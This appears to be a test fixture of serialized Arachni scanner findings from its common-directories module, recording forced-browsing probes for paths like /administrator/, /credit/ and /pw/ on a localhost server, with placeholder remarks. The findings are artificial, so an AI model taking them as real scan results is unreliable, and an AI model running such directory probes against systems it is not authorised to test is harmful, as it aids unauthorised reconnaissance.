mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/fpadmin/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/fpadmin/ injected: fpadmin id: fpadmin elem: path remarks: {} method: '' response: fpadmin headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/administrator/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/administrator/ injected: administrator id: administrator elem: path remarks: {} method: '' response: administrator headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTM= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/access/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/access/ injected: access id: access elem: path remarks: {} method: '' response: access headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Ng== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/library/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/library/ injected: library id: library elem: path remarks: :stuff: - Blah - Blah2 method: '' response: library headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/database/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/database/ injected: database id: database elem: path remarks: {} method: '' response: database headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/html/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/html/ injected: html id: html elem: path remarks: {} method: '' response: html headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: true references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/bin/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: true references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/bin/ injected: bin id: bin elem: path remarks: {} method: '' response: bin headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Mw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/Admin_files/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/Admin_files/ injected: Admin_files id: Admin_files elem: path remarks: {} method: '' response: Admin_files headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTE= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: true references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/credit/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: true references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/credit/ injected: credit id: credit elem: path remarks: {} method: '' response: credit headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Ng== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/public/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/public/ injected: public id: public elem: path remarks: :stuff: - Blah - Blah2 method: '' response: public headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Ng== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/dbase/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/dbase/ injected: dbase id: dbase elem: path remarks: {} method: '' response: dbase headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/priv/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/priv/ injected: priv id: priv elem: path remarks: {} method: '' response: priv headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: true references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/customer/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: true references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/customer/ injected: customer id: customer elem: path remarks: {} method: '' response: customer headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/asp/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/asp/ injected: asp id: asp elem: path remarks: {} method: '' response: asp headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Mw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/customers/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/customers/ injected: customers id: customers elem: path remarks: {} method: '' response: customers headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/pw/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/pw/ injected: pw id: pw elem: path remarks: {} method: '' response: pw headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Mg== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
